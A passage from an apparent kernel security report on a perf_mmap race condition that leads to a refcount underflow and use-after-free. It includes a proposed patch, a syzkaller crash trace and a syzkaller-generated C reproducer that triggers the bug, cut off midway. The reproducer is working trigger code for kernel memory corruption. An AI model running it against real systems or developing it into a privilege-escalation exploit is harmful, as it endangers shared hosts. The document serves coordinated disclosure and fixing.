5. Crash/Warning: When Thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb() or map_range()), the refcount_t infrastructure detects an "addition on 0", resulting in the KASAN or refcount_warn_saturate report.

Security impact
---------------

The vulnerability allows a local user to compromise system integrity by triggering a reference count saturation or a use-after-free (UAF) condition. While the immediate symptom is typically a kernel warning or a denial of service through a system hang or panic, especially in environments with panic_on_warn enabled, the underlying memory corruption represents a more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to leverage this UAF state to perform heap grooming.
If the freed memory is reallocated with a controlled structure, it could potentially be exploited to achieve local privilege escalation, making this a critical issue for multi-user systems or containerized environments where the perf_event interface is accessible.

Patch
--------------

From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001
From: 0ne1r0s <yuhaocheng035@gmail.com>
Date: Sat, 31 Jan 2026 21:16:52 +0800
Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap

The issue is caused by a race condition between mmap() and event
teardown. In perf_mmap(), the ring_buffer (rb) is accessed via
map_range() after the mmap_mutex is released. If another thread closes
the event or detaches the buffer during this window, the reference
count of rb can drop to zero, leading to a UAF or refcount saturation
when map_range() or subsequent logic attempts to use it.

Fix this by extending the scope of mmap_mutex to cover the entire setup
process, including map_range(), ensuring the buffer remains valid until
the mapping is complete.

Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com>
---
 kernel/events/core.c | 42 +++++++++++++++++++++---------------------
 1 file changed, 21 insertions(+), 21 deletions(-)

diff --git a/kernel/events/core.c b/kernel/events/core.c
index 2c35acc2722b..7c93f7d057cb 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
 		ret = perf_mmap_aux(vma, event, nr_pages);
 		if (ret)
 			return ret;
-	}
-
-	/*
-	 * Since pinned accounting is per vm we cannot allow fork() to copy our
-	 * vma.
-	 */
-	vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
-	vma->vm_ops = &perf_mmap_vmops;
-	mapped = get_mapped(event, event_mapped);
-	if (mapped)
-		mapped(event, vma->vm_mm);
-
-	/*
-	 * Try to map it into the page table. On fail, invoke
-	 * perf_mmap_close() to undo the above, as the callsite expects
-	 * full cleanup in this case and therefore does not invoke
-	 * vmops::close().
-	 */
-	ret = map_range(event->rb, vma);
-	if (ret)
-		perf_mmap_close(vma);
+	/*
+	 * Since pinned accounting is per vm we cannot allow fork() to copy our
+	 * vma.
+	 */
+	vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
+	vma->vm_ops = &perf_mmap_vmops;
+
+	mapped = get_mapped(event, event_mapped);
+	if (mapped)
+		mapped(event, vma->vm_mm);
+
+	/*
+	 * Try to map it into the page table. On fail, invoke
+	 * perf_mmap_close() to undo the above, as the callsite expects
+	 * full cleanup in this case and therefore does not invoke
+	 * vmops::close().
+	 */
+	ret = map_range(event->rb, vma);
+	if (ret)
+		perf_mmap_close(vma);
+	}

 	return ret;
 }
--
2.51.0

Request
-------

Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID.

Best regards,
Haocheng Yu
Zhejiang University

Syzkaller hit 'WARNING: refcount bug in perf_mmap' bug.

audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Modules linked in: CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f RSP: 0018:ffff8881036bf678 EFLAGS: 00010286 RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000 RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000 R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0 FS: 000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0 PKRU: 55555554 Call Trace: <TASK> __refcount_add include/linux/refcount.h:289 [inline] __refcount_inc include/linux/refcount.h:366 [inline] refcount_inc include/linux/refcount.h:383 [inline] perf_mmap_rb kernel/events/core.c:7005 [inline] perf_mmap+0x126d/0x1990 kernel/events/core.c:7163 vfs_mmap include/linux/fs.h:2405 [inline] mmap_file mm/internal.h:167 [inline] __mmap_new_file_vma mm/vma.c:2413 [inline] __mmap_new_vma mm/vma.c:2476 [inline] __mmap_region+0xea5/0x2250 mm/vma.c:2670 mmap_region+0x267/0x350 mm/vma.c:2740 do_mmap+0x769/0xe50 mm/mmap.c:558 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline] __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline] __x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xac/0x2a0 
arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f4a5add3b9d Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000 RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000 R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000 R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0 </TASK> ---[ end trace 0000000000000000 ]--- Syzkaller reproducer: # {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}} pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff) r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8) mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0) r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 
0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2) mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0) C reproducer: // autogenerated by syzkaller (https://github.com/google/syzkaller) #define _GNU_SOURCE #include <endian.h> #include <setjmp.h> #include <signal.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/syscall.h> #include <sys/types.h> #include <unistd.h> #ifndef __NR_pkey_mprotect #define __NR_pkey_mprotect 329 #endif static __thread int clone_ongoing; static __thread int skip_segv; static __thread jmp_buf segv_env; static void segv_handler(int sig, siginfo_t* info, void* ctx) { if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) { exit(sig); } uintptr_t addr = (uintptr_t)info->si_addr; const uintptr_t prog_start = 1 << 20; const uintptr_t prog_end = 100 << 20; int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0; int valid = addr < prog_start || addr > prog_end; if (skip && valid) { _longjmp(segv_env, 1); } exit(sig); } static void install_segv_handler(void) { struct sigaction sa; memset(&sa, 0, sizeof(sa)); sa.sa_handler = SIG_IGN; syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8); syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8); memset(&sa, 0, sizeof(sa)); sa.sa_sigaction = segv_handler; sa.sa_flags = SA_NODEFER | SA_SIGINFO; sigaction(SIGSEGV, &sa, NULL); sigaction(SIGBUS, &sa, NULL); } #define NONFAILING(...) 
\ ({ \ int ok = 1; \ __atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \ if (_setjmp(segv_env) == 0) { \ __VA_ARGS__; \ } else \ ok = 0; \ __atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \ ok; \ }) #define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off)) #define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \ *(type*)(addr) = \ htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \ (((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len)))) uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff}; int main(void) { syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul, /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); const char* reason; (void)reason; install_segv_handler(); intptr_t res = 0; if (write(1, "executing program\n", sizeof("executing program\n") - 1)) { } // pkey_mprotect arguments: [ // addr: VMA[0x2000] // len: len = 0x2000 (8 bytes) // prot: mmap_prot = 0x5 (8 bytes) // key: pkey (resource) // ] syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul, /*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 
bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 = 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) // bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // 
__reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x8 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); 
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); 
NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/(intptr_t)-1, /*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul); if (res != -1) r[0] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x0 (8 bytes) // flags: mmap_flags = 0x11 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 
= 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) // bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // __reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x2 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); 
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); 
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul); if (res != -1) r[1] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x100000b (8 bytes) // flags: mmap_flags = 